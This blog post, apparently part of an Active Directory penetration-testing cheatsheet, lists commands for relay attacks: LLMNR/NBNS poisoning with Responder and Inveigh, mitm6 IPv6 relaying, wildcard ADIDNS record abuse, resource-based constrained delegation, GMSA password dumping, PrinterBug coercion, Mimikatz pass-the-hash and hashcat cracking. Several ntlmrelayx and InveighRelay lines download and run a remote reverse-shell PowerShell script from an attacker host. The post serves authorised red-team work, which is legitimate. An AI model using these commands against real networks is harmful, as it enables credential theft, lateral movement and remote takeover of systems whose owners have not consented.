Here is another continuation of Active Directory Penetration Testing cheatsheet, this time - I am putting together few of the common relay attacks that we observe in pentests and red-team assessments.
#Relay attacks - Capturing SMB hashes
Import-Module .\Inveigh.ps1
#Start collecting hashes, we will see hashes whenever a user tries to access something non-existant via SMB
Invoke-Inveigh -ConsoleOutput Y
#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
LLMNR Poisoning #Start responder python Responder.py -I ens160 -rdw python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #cracking the hashes captured from inveigh hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
Relay Attack using Responder sudo python /usr/share/responder/Responder.py -I tun0 -A git clone https://github.com/dirkjanm/krbrelayx.git #adding a DNS Record sudo python3 dnstool.py -u 'steins.local\username' -p 'P@ssw0rd!' -a add -r 'application.steins.local' -d ATTACKER_IP SERVER_IP #wait for the victim to access our dns record :) you will get the user's NTLv2 Hash in responder #crack the hash with john john --format=netntlmv2 hash --wordlist=wordlist.txt
IPV6 Relay Attack
git clone https://github.com/dirkjanm/mitm6
cd mitm6
python -m pip install -r requirements.txt
#start mitm6
mitm6 -d domain.fqdn
#Start ntlmrelayx
ntlmrelayx.py -6 -t ldaps://DC_IPAddress -wh fakewpadname.domain.fqdn -l datadump
Also Checkout this article on abusing ipv6 via krbrelayx.py
Abusing ADIDNS and Relaying the Hashes
Import-module .\Invoke-DNSUpdate.ps1
Powershell Invoke-DNSupdate -DNSType A -DNSName test -DNSData 192.168.21.10 -Verbose
Import-module .\Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Tombstone -Verbose
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
#Capture all the users hashes
Import-module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -adidns combo
Invoke-Inveigh -ConsoleOutput Y -DNS Y
#Relaying the hashes for command execution
Import-module .\InveighRelay.ps1
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.2.1 -ShowHelp N -StatusOutput N -Command "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10:/rev.ps1')"
Resource Based Constrained Delegation on MSSQL Server
#Add a DNS Record using
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
#Login to the MSSQL Server and run xpdritree on the dnsname u just created
SQLCMD -S SERVER04\RE7_MS -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
#on your Kali box, run rbcd_relay.py
msDS-AllowedToActOnBehalfOfOtherIdentity is added to object SQL_server4$ for object USER
sudo proxychains python rbcd_relay.py 192.168.1.2 steins.local SQL_server4$ USER
#View the privileges of the user Get-ADComputer server -Server steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,Principalsallowedtodelegatetoaccount,msds-allowedtodelegateto,trustedtoauthfordelegation #Get TGT and gain access to the server
proxychains python3 ./getST.py -dc-ip 192.168.2.1 -spn cifs/server.steibslocal -impersonate sql_admin steins.local/sql_user:Password@123
export KRB5CCNAME=sql_admin.ccache;sudo proxychains psexec.py user/steinslocal@192.168.2.1 -k -no-pass -dc-ip 192.168.2.10 -target-ip 192.168.2.1
OR
.\Rubeus.exe s4u /user:sql_user /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server.steins.local /impersonateuser:sql_admin /dc:dc.steins.local /ptt
dir \\server.steins.local\c$
psexec \\server.steins.local cmd.exe
Abusing GMSA by relaying
Import-Module .\Invoke-DNSUpdate.ps1
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData Attacker_IP -Realm steins.local
#Invoke a web request from the service that is using GMSA
Invoke-WebRequest -uri "http://might.steins.local" -UseDefaultCredentials
#Start capturing the data using ntlmrelayx, if its running as administraor SAM hashes will be dumped
sudo proxychains ntlmrelayx.py --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs -debug -t ldaps://GMSA_running_machine_IP
#incase the data is shown as Password blob, you can use below to convert it to ntlm hash
(ConvertFrom-ADManagedPasswordBlob <blob>).SecureCurrentPassword | ConvertTo-NTHash OR if the user can read GMSA Passwords, you can use gMSADumper.py to dump the hashes python3 gMSADumper.py -u 'USERNAME' -p 'P@SSW0RD!' -d 'steins.local' -l 'dc.steins.local'
Abusing PrinterBug
#find machines with unconstrained Delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -ewq $True}
#Compromise and login to the machine with unconstrained Delegation enabled
Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe"'
#Run SampleSpool.exe on the unconstrianed degelation enabled machine
SpoolSample.exe TARGET_DOMAIN_FQDN UNCONSTRAINED_DOMAIN_FQDN
OR
proxychains python3 printerbug.py steins.local/guest@192.168.1.1 KALI_IP -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0'
sudo proxychains ntlmrelayx.py -t smb://192.168.1.1 -smb2support
Abusing ADIDNS to Send traffic to the target
#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose
#assign permissions to the ADIDNS
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -VerboseCapturing Hashes using responder and cracking hashes
sudo proxychains responder -I tun0 -v
hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force Relaying using ntlmrelayx
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory
# -c: execute the command
# -e: execute a binary
ntlmrelayx can automatically dump hashes, when it can access an administrator account.
so, lookout for the hashes in the output. Also Impacket 0.9.23-dev version has issues with ntlmrelay. better use the stable version.
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support
Useful commands
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support
sudo proxychains ntlmrelayx.py -t smb://10.10.10.10 -l loot -i -smb2support -c "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.102:8000/powerrev.ps1')"
#Target a specific user on a specific target
sudo proxychains ntlmrelayx.py -t smb://USERNAME@192.168.2.1 -smb2support Using Inveigh to Capture Hashes
Import-Module .\Inveigh.ps1
#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo
#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)
Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSCredential $Cred -ADIDNSDomain 192.168.2.10
Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController 192.168.2.10
#Capturing Hashes on the target
Invoke-Inveigh -ConsoleOutput Y -DNS Y
#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.21.155 -ShowHelp N -StatusOutput N -Command "powershell.exe -c whoami"
No comments:
Post a Comment